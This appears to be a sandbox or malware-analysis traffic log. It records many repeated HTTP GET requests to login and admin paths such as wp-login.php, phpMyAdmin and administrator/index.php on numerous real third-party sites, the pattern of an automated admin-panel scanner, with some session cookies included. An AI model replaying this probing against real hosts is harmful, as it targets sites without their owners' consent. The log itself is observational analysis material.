                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mgnbizlaw.com/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: __RequestVerificationToken=9Tw4eBQMtJgww6r2d6xlIUkI77SdB-d_QbVeWe2xleWw9E4exyU-bCgcjVhGShYDr4w6sPQ_lWAp-mq26ZSEINgjwx9o2Wpwu8Yy7vq2iaI1; ASP.NET_SessionId=setawluaocoer3ouv5bzrxfgUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/Home/Login?ReturnUrl=%2fadministrator%2f
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: __RequestVerificationToken=L4fpWIQFNsub_ozR1dLpTZAJEWIJbg0-lgoDkDO8Qi8CWGprPFppiqDMoPZXNqF4WckQK4Xpzk7D75Wvq450-nfzCBGxRAFFOm9JKEQ5MEM1; ASP.NET_SessionId=1m3pbchoknzanfqou5v0n44xUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/Home/Login?ReturnUrl=%2fadministrator%2f
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://malibusands.net/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mcsmk8.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: ASP.NET_SessionId=oapnk3hjjknady5gfqszwsoqUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: ASP.NET_SessionId=z5yl5z5srju4rf2wkb4qhiw2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
